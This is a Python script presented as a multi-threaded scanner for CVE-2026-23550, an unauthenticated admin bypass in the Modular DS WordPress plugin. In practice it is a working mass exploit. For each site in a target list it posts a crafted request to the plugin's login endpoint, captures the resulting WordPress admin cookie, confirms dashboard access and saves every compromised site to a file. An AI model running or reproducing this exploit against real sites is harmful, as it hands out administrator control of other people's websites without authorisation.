#!/usr/bin/env python3 """ ██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗ ██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗ ██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝ ██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗ ██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ https://github.com/dzmind2312 CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded) """ import requests import threading import time import sys import argparse from concurrent.futures import ThreadPoolExecutor, as_completed from rich.console import Console from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn from rich.table import Table from rich import print import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class ModularDSScanner: def __init__(self, targets_file, threads=20, output="vulns.txt"): self.console = Console() self.targets_file = targets_file self.threads = threads self.output = output self.vulnerable = [] self.results = [] def test_target(self, target): """Test single target for CVE-2026-23550""" try: # Clean target URL if not target.startswith(('http://', 'https://')): target = 'https://' + target.lstrip('/') session = requests.Session() session.verify = False # Exploit unauth admin login endpoint = f"{target.rstrip('/')}/wp-content/plugins/modular-ds/api/modular-connector/login" response = session.post( endpoint, json={"origin": "mo"}, headers={"Content-Type": "application/json"}, timeout=10 ) # Check for admin cookie admin_cookie = any( 'wordpress_logged_in_' in cookie.name for cookie in session.cookies ) # Verify wp-admin access if admin_cookie: admin_resp = session.get(f"{target.rstrip('/')}/wp-admin/", timeout=5) has_admin = any( word in admin_resp.text.lower() for word in ['dashboard', 'wp-admin', 'welcome'] ) if has_admin: self.vulnerable.append(target) self.results.append({ 'target': target, 'status': '🔥 FULL ADMIN ACCESS', 'cookies': len(session.cookies) }) return f"[green]✅ VULNERABLE: {target}[/green]" else: self.results.append({ 'target': target, 'status': '⚠️ Admin Cookie (No Dashboard)', 'cookies': len(session.cookies) }) return f"[yellow]⚠️ Admin Cookie: {target}[/yellow]" return f"[dim]❌ Not Vulnerable: {target}[/dim]" except Exception as e: return f"[red]✗ Error: {target} ({str(e)[:50]})[/red]" def scan(self): """Main scanning logic with progress bar""" with open(self.targets_file, 'r') as f: targets = [line.strip() for line in f if line.strip() and not line.startswith('#')] self.console.print(f""" [bold cyan]🔥 CVE-2026-23550 Modular DS Scanner 🔥 ██████╗ ███████╗ ███╗ ███╗██╗███╗ ██╗██████╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗ ██████╗ ██████╗ ██╔══██╗╚══███╔╝ ████╗ ████║██║████╗ ██║██╔══██╗ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗ ██║ ██║ ███╔╝ ██╔████╔██║██║██╔██╗ ██║██║ ██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║ ██║ ██║██████╔╝ ██║ ██║ ███╔╝ ██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║ ██║ ██║██╔══██╗ ██████╔╝███████╗ ██║ ╚═╝ ██║██║██║ ╚████║██████╔╝ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║ ╚██████╔╝██║ ██║ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ https://github.com/dzmind2312 CVE-2026-23550 Modular DS Admin Bypass Scanner (Multi-threaded) [/bold cyan] [bright_black]Targets: {len(targets)} | Threads: {self.threads} | Output: {self.output}[/bright_black] """) # Rich progress bar with Progress( SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), console=self.console ) as progress: task = progress.add_task("Scanning Modular DS...", total=len(targets)) with ThreadPoolExecutor(max_workers=self.threads) as executor: futures = {executor.submit(self.test_target, target): target for target in targets} for future in as_completed(futures): result = future.result() self.console.print(result) progress.advance(task) # Summary table self.console.print("\n" + "="*80) table = Table(title="Scan Results") table.add_column("Status", style="cyan") table.add_column("Target", style="magenta") table.add_column("Details", style="green") for result in self.results: table.add_row( result['status'], result['target'], f"{result['cookies']} cookies" ) self.console.print(table) # Save vulnerable if self.vulnerable: with open(self.output, 'w') as f: for vuln in self.vulnerable: f.write(f"{vuln}\n") self.console.print(f"\n[bold green]💾 {len(self.vulnerable)} vulnerable targets → {self.output}[/bold green]") else: self.console.print("\n[bold green]✅ No vulnerabilities found![/bold green]") def main(): parser = argparse.ArgumentParser(description="CVE-2026-23550 Modular DS Scanner") parser.add_argument("-l", "--list", required=True, help="Targets file (one URL per line)") parser.add_argument("-t", "--threads", type=int, default=20, help="Max threads (default: 20)") parser.add_argument("-o", "--output", default="vulns.txt", help="Output file (default: vulns.txt)") args = parser.parse_args() scanner = ModularDSScanner(args.list, args.threads, args.output) scanner.scan() if __name__ == "__main__": main()